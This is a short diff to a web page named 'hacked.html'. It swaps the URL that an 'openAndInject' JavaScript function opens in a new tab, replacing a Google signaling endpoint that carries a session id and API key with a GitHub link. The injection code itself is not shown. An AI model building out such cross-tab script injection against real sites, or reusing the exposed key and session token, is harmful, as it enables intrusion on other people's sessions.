--- a/hacked.html
+++ b/hacked.html
@@ -38,7 +38,7 @@
     }
 
     function openAndInject() {
-      const win = window.open("https://prod-dynamite-prod-09-us-signaler-pa.clients6.google.com/punctual/multi-watch/channel?VER=8&gsessionid=i9Bs3AwFzHO6Yd-9otOqRNhwzSkUNdIixKEywrcd9Wo&key=AIzaSyB0RaagJhe9JF2mKDpMml645yslHfLI8iA&RID=62906&CVER=22&zx=hj61wnku2mml&t=1", "_blank");
+      const win = window.open("https://github.com/lanaya113505/pizza/blob/main/hacked.html", "_blank");
 
       // Tunggu tab Web 2 selesai dimuat
       win.onload = function() {
